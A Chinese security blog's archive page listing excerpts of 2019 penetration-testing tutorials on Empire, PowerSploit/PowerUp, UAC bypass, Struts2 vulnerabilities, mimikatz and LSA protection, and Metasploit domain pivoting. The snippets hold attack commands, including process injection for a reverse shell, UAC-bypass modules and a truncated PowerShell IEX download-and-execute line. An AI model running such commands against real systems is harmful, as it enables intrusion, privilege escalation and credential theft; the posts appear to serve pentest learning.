上一页 1 ··· 10 11 12 13 14 15 16 17 18 ··· 22 下一页
摘要: 会话注入 我们可以使用usemodule management/psinject模块来进程注入,获取权限 设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shell usemodule management/psinject set Li 阅读全文
posted @ 2019-10-25 23:46 micr067 阅读(487) 评论(0) 推荐(0) 编辑
摘要: 权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) 当运行完提权模块后,back返 阅读全文
posted @ 2019-10-25 00:48 micr067 阅读(470) 评论(0) 推荐(0) 编辑
摘要: 0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mi 阅读全文
posted @ 2019-10-24 00:50 micr067 阅读(938) 评论(0) 推荐(1) 编辑
摘要: PowerUp攻击模块实战 1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行 2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。 powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient) 阅读全文
posted @ 2019-10-22 23:45 micr067 阅读(457) 评论(0) 推荐(0) 编辑
摘要: PowerSploit PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit 安装 下载程序 阅读全文
posted @ 2019-10-22 00:12 micr067 阅读(375) 评论(0) 推荐(0) 编辑
摘要: Windows powershell是一种命令行外壳程序和脚本环境,它内置在win7以上版本的操作系统中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。powershell程序可以直接在内存中运行,可以作为命令提示符cmd.exe的扩充。 查看powershell版本信息 阅读全文
posted @ 2019-10-22 00:08 micr067 阅读(351) 评论(0) 推荐(0) 编辑
摘要: Structs2框架已知的漏洞编号如下: S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057 S2-0 阅读全文
posted @ 2019-10-06 09:45 micr067 阅读(643) 评论(0) 推荐(0) 编辑
摘要: 简介: 微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。 微软官方文档:https://docs.microsoft.com/en-us/prev 阅读全文
posted @ 2019-10-04 08:19 micr067 阅读(237) 评论(0) 推荐(0) 编辑
摘要: 使用docker搭建漏洞测试环境 micr067@test:~/vulhub/weblogic/CVE-2018-2894$ sudo docker-compose build weblogic uses an image, skipping micr067@test:~/vulhub/weblog 阅读全文
posted @ 2019-09-29 20:47 micr067 阅读(3038) 评论(0) 推荐(0) 编辑
摘要: MSF 下域内渗透实战 先获取域内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255. 阅读全文
posted @ 2019-09-26 18:24 micr067 阅读(130) 评论(0) 推荐(0) 编辑
上一页 1 ··· 10 11 12 13 14 15 16 17 18 ··· 22 下一页